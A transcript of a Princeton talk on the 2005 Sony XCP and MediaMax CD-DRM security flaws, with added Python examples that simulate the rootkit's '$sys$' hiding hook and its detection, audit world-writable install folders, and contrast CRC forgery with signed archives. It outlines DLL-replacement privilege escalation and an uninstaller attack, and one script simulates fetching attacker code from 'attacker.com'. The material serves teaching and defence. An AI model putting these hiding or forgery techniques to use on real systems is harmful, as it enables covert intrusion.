Dangerous Tunes: Lessons from the Sony CD-DRM Episode (J. Alex Halderman and Edward W. Felten, Center for Information Technology Policy)

Slide 1: Dangerous Tunes. Lessons from the Sony CD-DRM Episode. J. Alex Halderman and Edward W. Felten, Center for Information Technology Policy, Department of Computer Science, Princeton University

Slide 2: The “Episode” – Fall 2005
– World’s second-largest music company
– Major anti-piracy plan, gone badly awry
– Millions of copies of dangerous software
– Hundreds of thousands of PCs at risk
– International protests, class-action suits
– Multi-million-dollar recall, settlements
– A case study of digital rights management

Slide 3: Cast of Characters
– First4Internet (XCP): 52 titles, 4.7 million discs
– SunnComm (MediaMax, “Light years beyond encryption™”): 37 titles, 20 million discs

Slide 4: In Today’s Talk
1. How CD DRM works
2. Vulnerabilities
   – The XCP rootkit
   – Spyware-like behaviors
   – MediaMax player hole
   – Uninstaller holes
3. Conclusions
Content protection problems lead to user security problems; lessons for the security and IT policy communities.
Focus: vulnerabilities for end users, not holes in the content protection itself.

Slide 5: What is CD DRM?
– CD players: the disc plays normally
– Computers: restricted use, e.g. can’t copy the disc, can’t rip it as MP3, can’t use it on an iPod

Slide 6: Passive Protection
[Diagram: layered stack of application (ripper/copier), OS and drivers]
Modify the data format on the disc to confuse the hardware or OS.

Slide 7: Active Protection
[Diagram: the same stack, with protection software added alongside the drivers]
Install a protection driver that breaks ripping/copying applications.

Slide 8: Active Protection
The first time a protected CD is inserted:
– Autorun (a normal Windows feature) executes the installer from the CD
– The installer installs the active protection driver
– The driver remains on the system
[Diagram: stack with the protection driver in place]

Slide 9: Active Protection
[Diagram: two stacks, one with a normal CD, one with a CD marked as protected]
When the user tries to rip or copy a disc:
– The active protection software interposes between the CD driver and the application
– It checks the disc: should access be denied?
– If yes, it introduces errors into the audio

Slide 10: Defeating Active Protection
– Prevent installation: the infamous shift-key ‘attack’ (holding Shift disables autorun for that insertion), turning autorun off, or using Linux, Mac OS, etc.
– Interfere with disc detection
– Disable or remove the protection drivers

Slide 11: XCP Rootkit: Motivation
Content protection problem: users will remove active protection software.
XCP response: actively conceal its processes, files, and registry keys.

Slide 12: The XCP Rootkit

Slide 13: XCP Rootkit: Discovery. Discovered by Mark Russinovich, October 31, 2005.

Slide 14: XCP Rootkit: Operation
A normal Windows system call (list the files in a directory): the application calls NtQueryDirectoryFile(...); the kernel looks the service up in KeServiceDescriptorTable and dispatches to its own implementation at 0x8060bb9c.

KeServiceDescriptorTable (before XCP):
  NtQueryDirectoryFile      0x8060bb9c
  NtCreateFile              0x8056b9c8
  NtQuerySystemInformation  0x805ca104
  NtEnumerateKey            0x805010d0
  NtOpenKey                 0x805c9e3c
  ...

0x8060bb9c (Windows kernel):
  int NtQueryDirectoryFile(...) { ... }

Slide 15: XCP Rootkit: Operation
After XCP installs its driver, the table entry for NtQueryDirectoryFile points into Aries.sys instead of the kernel; the application’s call is unchanged, but now lands in the rootkit.

KeServiceDescriptorTable (after XCP):
  NtQueryDirectoryFile      0xf967bfa   (changed)
  NtCreateFile              0x8056b9c8
  NtQuerySystemInformation  0x805ca104
  NtEnumerateKey            0x805010d0
  NtOpenKey                 0x805c9e3c
  ...

0xf967bfa (rootkit, Aries.sys):
  int Rootkit_QueryDirectoryFile(...) {
    ...
    if filename begins with “$sys$”: remove from results
  }

Slide 16: XCP Rootkit: Operation
Magic prefix: $sys$. Files, processes, and registry keys whose names begin with it are hidden.
Exception: if the calling process’s name starts with $sys$, it can see everything.

Slide 17: XCP Rootkit: Problems
Local privilege escalation:
– All marked files, processes, and registry keys are hidden, not just XCP’s own
– Malware run by a non-privileged user can’t install its own rootkit, but can use XCP’s
– Used to hide from virus checkers and admin tools
Exploits in the wild: Backdoor.Ryknos.B, Trojan.Welomoch
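An added illustration of slides 14–17 in user-mode Python (not the slides’ or XCP’s code): a service table whose NtQueryDirectoryFile entry is swapped for a filter that drops “$sys$” names unless the caller’s own name starts with “$sys$”, plus the two checks a practitioner runs against such a hook, a table-integrity comparison and a cross-view diff of the API listing against a raw read of the volume. The directory listing, the process names and the “$sys$evil.exe” that rides along on XCP’s hiding are constructed; the table and handler names are stand-ins for the kernel structures on the slides.

```python
MAGIC = "$sys$"

# Constructed on-disk listing: the raw view, which the hook never touches.
DISK = {
    r"C:\WINDOWS\system32": [
        "kernel32.dll",
        "$sys$aries.sys",       # XCP's own driver, hidden by its prefix
        "$sys$DRMServer.exe",   # an XCP process (name assumed for the example)
        "$sys$evil.exe",        # unrelated malware that chose the prefix to be hidden too
        "calc.exe",
    ],
}

def nt_query_directory_file(caller, path):
    """Stand-in for the genuine kernel service: returns every entry on disk."""
    return list(DISK[path])

# Stand-in for KeServiceDescriptorTable: service name -> handler the kernel dispatches to.
SERVICE_TABLE = {"NtQueryDirectoryFile": nt_query_directory_file}
CLEAN_TABLE = dict(SERVICE_TABLE)   # known-good copy, as an integrity checker keeps

def install_rootkit():
    """Aries.sys-style hook: point the table entry at a filter wrapped around the original."""
    original = SERVICE_TABLE["NtQueryDirectoryFile"]

    def hooked_query_directory_file(caller, path):
        results = original(caller, path)
        if caller.startswith(MAGIC):          # slide 16's exception: $sys$ callers see everything
            return results
        return [name for name in results if not name.startswith(MAGIC)]

    SERVICE_TABLE["NtQueryDirectoryFile"] = hooked_query_directory_file

def remove_rootkit():
    SERVICE_TABLE.update(CLEAN_TABLE)

def app_list_directory(caller, path):
    """What any application (Explorer, a virus scanner) gets back from the system call."""
    return SERVICE_TABLE["NtQueryDirectoryFile"](caller, path)

def hooked_services():
    """Detection 1, table integrity: entries no longer pointing at the known-good handler."""
    return [name for name, fn in SERVICE_TABLE.items() if fn is not CLEAN_TABLE[name]]

def cross_view_hidden(caller, path):
    """Detection 2, cross-view diff: anything in the raw view (here DISK) that the
    API view omits is being hidden from this caller."""
    return sorted(set(DISK[path]) - set(app_list_directory(caller, path)))

def demo():
    path = r"C:\WINDOWS\system32"
    install_rootkit()
    try:
        return {
            "explorer_sees": app_list_directory("explorer.exe", path),
            "xcp_process_sees": app_list_directory("$sys$DRMServer.exe", path),
            "hooked": hooked_services(),
            "hidden": cross_view_hidden("scanner.exe", path),
        }
    finally:
        remove_rootkit()

if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The cross-view check is the shape of RootkitRevealer’s approach: it needs a second path to the data that does not go through the hooked table, which in user space means reading the volume or the registry hive directly.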

Slide 18: XCP Rootkit: Reaction
“Most people, I think, don't even know what a Rootkit is, so why should they care about it?” — Thomas Hesse, President, Sony BMG Global Digital Business (Nov. 4)
“It’s very important to remember that it’s your intellectual property — it’s not your computer. And in the pursuit of protection of intellectual property, it’s important not to defeat or undermine the security measures that people need to adopt in these days.” — Stewart Baker, Asst. U.S. Secretary of Homeland Security (Nov. 14)
Nov. 3: Sony releases first patch to remove the rootkit
Nov. 10: First class-action lawsuits filed against Sony
Nov. 15: Sony recalls XCP discs

Slide 19: XCP Rootkit: Lessons
– XCP CDs were on sale for six months (~2 million discs) before the rootkit was revealed
– Not detected by any commercial anti-virus or anti-spyware software
– Security vendors need to scrutinize software from major content companies more closely, no matter how worthy its goals

Slide 20: XCP and MediaMax Players

Slide 21: Spyware-like Behavior
Both XCP and MediaMax “phone home” about each album played:
– Purpose: platform monetization (selling ads)
– The vendor learns the album ID and the user’s IP address
– An IP address can sometimes be linked to a specific person
– Not disclosed in the EULAs or privacy policies
Example request (MediaMax):
  POST /perfectplacement/retrieveassets.asp?id=7F63A4FD-9FBD-486B-B473-D18CC92D05C0 HTTP/1.1
  Host: license.sunncomm2.com

Slide 22: Spyware-like Behavior
Both XCP and MediaMax:
– Ship without a meaningful uninstaller
– Install without consent, or exceed the consent given:
  – Both block access to many CDs, not just the one inserted
  – XCP installs an undisclosed rootkit
  – MediaMax installs 13+ MB of software even if the user declines

Slide 23: CD DRM Players: Lessons
– Spyware is hard to define, but certain behaviors are clearly contrary to norms
– Goal: informed consent, particularly for controversial behaviors

Slide 24: MediaMax Player: Motivation
Content protection problem:
– Users will decline to install active protection
– Platform building is very lucrative for the vendor: an incentive mismatch between vendor and label
MediaMax response: install aggressively, regardless of consent.

Slide 25: MediaMax Player: Problem

Slide 26: MediaMax Player: Problem
The installed MediaMax files carry permissions granting Everyone Full Control. Even if an administrator tightens them, they are reset to this insecure state the next time a MediaMax CD is inserted.

Slide 27: MediaMax Player: Attack 1 (Jesse Burns and Alex Stamos)
1. A non-privileged user replaces MMX.exe with an attack version
2. A privileged user plays the CD
3. The attack code runs with the privileged user’s privileges

Slide 28: MediaMax Player: Attack 2
1. The attacker prepares a booby-trapped MediaMax.dll with malicious code in its DllMain() function
2. A non-privileged user replaces the installed file with the attack version
3. A privileged user inserts the CD
4. Even before displaying a EULA, the software on the CD loads MediaMax.dll to check its version, which runs DllMain()
5. The attack code runs with the privileged user’s privileges

Slide 29: MediaMax Player: Attack 2 (continued)
Sony’s patch for the first attack checks the MediaMax.dll version (to avoid deactivating future DRM versions?). If the DLL is already booby-trapped, applying the patch sets off the attack code. Users are vulnerable even if they never accepted the EULA.
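The check a practitioner would run for the slide 26 condition behind attacks 1 and 2, as an added example (not Sony’s, SunnComm’s or the authors’ code): parse the file written by `icacls <dir> /save <file> /t` (one line per path, one SDDL line per DACL) and flag every directory under Program Files where Everyone, Users, Authenticated Users or Interactive still hold write-class rights once deny entries are subtracted. The sample output and the directory names in it are constructed.

```python
import re

# Constructed stand-in for the file written by `icacls "C:\Program Files" /save acls.txt /t`:
# a line with each path (relative to the directory given), then a line with its DACL in SDDL.
SAMPLE_SAVE_OUTPUT = """\
Common Files\\SunnComm Shared
D:AI(A;OICI;FA;;;WD)(A;ID;FA;;;SY)(A;ID;FA;;;BA)
Common Files\\Microsoft Shared
D:AI(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0x1200a9;;;BU)
Common Files\\Example Vendor
D:PAI(A;OICI;FA;;;SY)(A;OICI;FA;;;BA)(A;OICI;0x1200a9;;;BU)(A;OICI;GW;;;AU)
"""

# SDDL two-letter rights codes -> access-mask bits (generic, file-specific and standard rights).
RIGHTS = {
    "GA": 0x10000000, "GR": 0x80000000, "GW": 0x40000000, "GX": 0x20000000,
    "FA": 0x001F01FF, "FR": 0x00120089, "FW": 0x00120116, "FX": 0x001200A0,
    "RC": 0x00020000, "SD": 0x00010000, "WD": 0x00040000, "WO": 0x00080000,
    "CC": 0x1, "DC": 0x2, "LC": 0x4, "SW": 0x8, "RP": 0x10, "WP": 0x20,
    "DT": 0x40, "LO": 0x80, "CR": 0x100,
}
# Bits that let the holder change what is in a directory: write/add file, append/add subdirectory,
# write EA, delete child, write attributes, DELETE, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_ALL.
WRITE_BITS = 0x2 | 0x4 | 0x10 | 0x40 | 0x100 | 0x10000 | 0x40000 | 0x80000 | 0x40000000 | 0x10000000

# Principals any local user can act as, by SDDL alias or raw SID. (In the SID field WD is Everyone;
# in the rights field WD means WRITE_DAC.)
BROAD_PRINCIPALS = {
    "WD": "Everyone", "S-1-1-0": "Everyone",
    "BU": "Users", "S-1-5-32-545": "Users",
    "AU": "Authenticated Users", "S-1-5-11": "Authenticated Users",
    "IU": "Interactive", "S-1-5-4": "Interactive",
}

ACE_RE = re.compile(r"\(([^)]*)\)")

def rights_mask(field):
    """Decode an SDDL rights field: a hex mask or concatenated two-letter codes."""
    if field.lower().startswith("0x"):
        return int(field, 16)
    mask = 0
    for i in range(0, len(field), 2):
        mask |= RIGHTS[field[i:i + 2]]    # KeyError surfaces a code this table does not know
    return mask

def broad_write_access(sddl):
    """[(principal, write bits)] for broad principals whose allow ACEs, minus their deny ACEs,
    still grant write-class access."""
    allowed, denied = {}, {}
    for ace in ACE_RE.findall(sddl):
        parts = ace.split(";")
        if len(parts) < 6:
            continue
        ace_type, _flags, rights, _obj, _inh, sid = parts[:6]
        if sid not in BROAD_PRINCIPALS or ace_type not in ("A", "D"):
            continue
        table = allowed if ace_type == "A" else denied
        table[sid] = table.get(sid, 0) | rights_mask(rights)
    findings = []
    for sid, mask in allowed.items():
        effective = mask & ~denied.get(sid, 0) & WRITE_BITS
        if effective:
            findings.append((BROAD_PRINCIPALS[sid], effective))
    return findings

def audit(save_output):
    """[(path, principal, write bits)] over every path/DACL pair in the /save file."""
    lines = [ln.rstrip("\r") for ln in save_output.splitlines() if ln.strip()]
    return [(path, who, bits)
            for path, sddl in zip(lines[0::2], lines[1::2])
            for who, bits in broad_write_access(sddl)]

def remediation(path, principal, root=r"C:\Program Files"):
    """icacls command that strips the broad grant (run elevated). Slide 26 is the caveat:
    MediaMax put the grant back on the next CD insert, so the audit has to be repeated."""
    return f'icacls "{root}\\{path}" /remove:g "{principal}"'

if __name__ == "__main__":
    for path, who, bits in audit(SAMPLE_SAVE_OUTPUT):
        print(f"{path}: {who} holds write access 0x{bits:08x}  ->  {remediation(path, who)}")
```

Reading the DACL rather than trusting the installer is the point: an ACE such as (A;OICI;FA;;;WD) on a directory that a privileged user later executes from is exactly the precondition for attacks 1 and 2, whatever the software is called.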

Slide 30: MediaMax Player: Lessons
– Aggressive DRM can make other security problems harder to fix
– Vendors may take longer to fix security problems when doing so may weaken content protection

Slide 31: XCP and MediaMax Uninstallers

Slide 32: Uninstallers: Motivation
Content protection problem: angry customers demand the ability to remove the active protection software, e.g. to resolve security problems.
XCP and MediaMax response: make the uninstallers hard to get, and use an online design to limit who can use them.

Slide 33: XCP Uninstaller: Step 1

Slide 34: XCP Uninstaller: Step 2. Wait for … (hours)

Slide 35: XCP Uninstaller: Step 3

Slide 36: XCP Uninstaller: Step 4. Wait for a second … (several days)

Slide 37: XCP Uninstaller: Step 5. Finally, visit the web page and run the uninstaller. (But if you insert the CD again, go back to step 1!)

Slide 38: XCP Uninstaller: Operation
1. The XCP uninstall web page calls the ActiveX control: CodeSupport.Uninstall(“…”)
2. The client (CodeSupport.ocx) sends “HTTP GET /XCP.dat” to the server sony-bmg.com, which returns XCP.dat
3. The client extracts InstallLite.dll from XCP.dat and calls its function UninstallXCP
Problems:
– The ActiveX control will accept an arbitrary URL
– The code fetched from that URL is not authenticated
– The control is not removed after use

Slide 39: XCP Uninstaller: Attack
1. The attacker constructs Evil.dat: an InstallLite.dll with attack code in its UninstallXCP function
2. The victim visits the attacker’s web page, which calls CodeSupport.Uninstall(“…”)
3. The client (CodeSupport.ocx) sends “HTTP GET /Evil.dat” to the server attacker.com, which returns Evil.dat
4. The client extracts InstallLite.dll from Evil.dat and calls UninstallXCP
5. The attack code runs with the local user’s privileges

Slide 40: Constructing Evil.dat
Archive files are protected with a proprietary CRC.
Header: Name=“UninstallXCP.dat”, CRC=0x03cb1a88
ActiveX control:
  1. C = ComputeCRC(…)
  2. If C != Header.CRC then Terminate
  3. Extract and execute file
Attack:
  1. Prepare Evil.dat with a random CRC
  2. Run with a breakpoint at line 2
  3. Take the computed CRC and place it in Evil.dat
Lesson: use a digital signature!
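An added example, not XCP’s or the authors’ code, of slides 38–40 (and of the same shape of flaw in the MediaMax uninstaller on slide 42): an archive protected by a CRC is forged by the very code that builds it, because the check is a function of the file alone, while a signed archive survives the payload swap; the control’s entry point is also pinned to an allowed origin. CRC32 stands in for the proprietary CRC and the container layout is assumed; the RSA is textbook, with fixed Mersenne primes and a truncated hash, for illustration only; the URLs, the DLL “payloads” and the offline NETWORK table are constructed.

```python
import hashlib
import struct
import zlib
from urllib.parse import urlparse

# Assumed container layout (not XCP.dat's real format):
#   u32 name length | name | u32 check | u32 payload length | payload [| signature]
def pack(name, payload, check):
    nb = name.encode()
    return struct.pack("<I", len(nb)) + nb + struct.pack("<II", check, len(payload)) + payload

def unpack(blob):
    (nlen,) = struct.unpack_from("<I", blob, 0)
    name = blob[4:4 + nlen].decode()
    check, plen = struct.unpack_from("<II", blob, 4 + nlen)
    body = 12 + nlen
    return name, check, blob[body:body + plen]

# --- Slide 40's design: the check is a pure function of the file. ---
def build_crc_archive(name, payload):
    """Vendor's packer and, line for line, the attacker's forger: anyone who can run the CRC
    (or read it off a breakpoint, steps 2-3 on the slide) can fill in the header."""
    return pack(name, payload, zlib.crc32(payload))   # CRC32 stands in for the proprietary CRC

def client_verify_crc(blob):
    name, check, payload = unpack(blob)
    if zlib.crc32(payload) != check:
        raise ValueError("CRC mismatch")
    return name, payload

# --- The lesson: a signature the client can verify but cannot produce. ---
# Textbook RSA over a truncated SHA-256 with fixed Mersenne primes, for illustration only
# (real code: a vetted library, RSA-PSS or Ed25519, full-length hash). Needs Python 3.8+.
P, Q, E = (1 << 61) - 1, (1 << 89) - 1, 65537
N = P * Q
D = pow(E, -1, (P - 1) * (Q - 1))        # private exponent: exists only on the vendor's signing host
SIG_LEN = (N.bit_length() + 7) // 8

def digest_int(name, payload):
    h = hashlib.sha256(name.encode() + b"\0" + payload).digest()
    return int.from_bytes(h[:16], "big")  # 128 bits, well below N

def vendor_sign_archive(name, payload):
    sig = pow(digest_int(name, payload), D, N)
    return pack(name, payload, 0) + sig.to_bytes(SIG_LEN, "big")

def client_verify_signature(blob):
    name, _, payload = unpack(blob)
    sig = int.from_bytes(blob[-SIG_LEN:], "big")
    if pow(sig, E, N) != digest_int(name, payload):
        raise ValueError("bad signature")
    return name, payload

def swap_payload_keep_signature(signed_blob, evil_payload):
    """The CRC trick replayed against a signed archive: the body can be rewritten,
    but the trailing signature cannot be recomputed without D."""
    name, _, _ = unpack(signed_blob)
    return pack(name, evil_payload, 0) + signed_blob[-SIG_LEN:]

# --- The control's entry point, before and after. ---
ALLOWED_ORIGINS = {"https://sony-bmg.com"}           # assumed origin of the genuine uninstaller
VENDOR_DLL = b"InstallLite.dll: UninstallXCP"        # constructed stand-ins for DLL bodies
EVIL_DLL = b"InstallLite.dll: attacker's UninstallXCP"
NETWORK = {                                          # constructed, offline stand-in for HTTP GET
    "http://sony-bmg.com/XCP.dat": build_crc_archive("UninstallXCP.dat", VENDOR_DLL),
    "http://attacker.com/Evil.dat": build_crc_archive("UninstallXCP.dat", EVIL_DLL),
    "https://sony-bmg.com/XCP.dat": vendor_sign_archive("UninstallXCP.dat", VENDOR_DLL),
    "https://attacker.com/Evil.dat": swap_payload_keep_signature(
        vendor_sign_archive("UninstallXCP.dat", VENDOR_DLL), EVIL_DLL),
}

def vulnerable_uninstall(url):
    """CodeSupport.Uninstall as slide 38 describes it: any URL, CRC only, then run what arrived."""
    _, dll = client_verify_crc(NETWORK[url])
    return dll          # stands in for loading InstallLite.dll and calling UninstallXCP

def hardened_uninstall(url):
    """Pin the origin, then accept only what the vendor signed."""
    u = urlparse(url)
    if f"{u.scheme}://{u.hostname}" not in ALLOWED_ORIGINS:
        raise PermissionError(f"refusing to fetch code from {u.scheme}://{u.hostname}")
    _, dll = client_verify_signature(NETWORK[url])
    return dll

if __name__ == "__main__":
    print("vulnerable, attacker URL:", vulnerable_uninstall("http://attacker.com/Evil.dat"))
    print("hardened, vendor URL:   ", hardened_uninstall("https://sony-bmg.com/XCP.dat"))
```

The two defenses are independent and both are needed: the origin check stops an attacker’s page from pointing the control at its own server, and the signature stops a payload swapped in transit or on a compromised mirror, which the origin check alone would accept.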

Slide 41: MediaMax Uninstaller. “Oops!... I did it again”

Slide 42: MediaMax Uninstaller
1. The MediaMax uninstall web page calls the ActiveX control: AxWebRemove.Remove(…, “…”)
2. The client (AxWebRemove.ocx) sends “GET /validate.asp?key=3984-…” to the server sunncomm.com, which responds with “…”
3. The client sends “GET /webrem.dll” to the server sunncomm.com, which returns WebRem.dll
4. The client calls function ECF7() from WebRem.dll
The same design as the XCP uninstaller: the control fetches code from a URL and runs it.

Slide 43: Uninstallers: Lessons
– Content security problems complicate the design of software systems, inviting security problems
– Resources devoted to content security at the expense of user security may allow simple vulnerabilities to slip through

Slide 44: Chronology (2005)
Oct. 31: Rootkit revealed
Nov. 3: Sony releases XCP patch
Nov. 10: First suits filed against Sony
Nov. 14: XCP patch/uninstaller hole
Nov. 15: Sony recalls XCP discs
Nov. 17: MediaMax uninstaller hole
Dec. 6: MediaMax player hole
Dec. 7: Hole in the patch for the MediaMax player hole
Dec. 30: First suits settled

Slide 45: Aftermath
– XCP discs recalled; MediaMax halted (but still on many store shelves)
– Major class-action suits settled: customers can trade discs for cash, downloads, and non-DRM versions
– State and federal governments still investigating
– Sony won’t use CD DRM, for now

Slide 46: Conclusions
– DRM poses threats to user security and privacy
– The security community and policymakers must be wary, despite the worthy goal of protecting copyright
– Even major content vendors should be scrutinized

Slide 47: Conclusions
The efficacy of DRM can be inversely related to the user’s ability to defend against security threats:
– Users need to understand and control the operation of their computers
– Some DRM systems rely on undermining that understanding and control (the XCP rootkit)

Slide 48: The Stakes are High!
Bad DRM can:
– Harm users
– Create major liability for content owners
– Reduce sales for artists
– Ultimately, reduce the incentive to create

Slide 49: Dangerous Tunes. Lessons from the Sony CD-DRM Episode. J. Alex Halderman and Edward W. Felten, Center for Information Technology Policy, Department of Computer Science, Princeton University. Paper: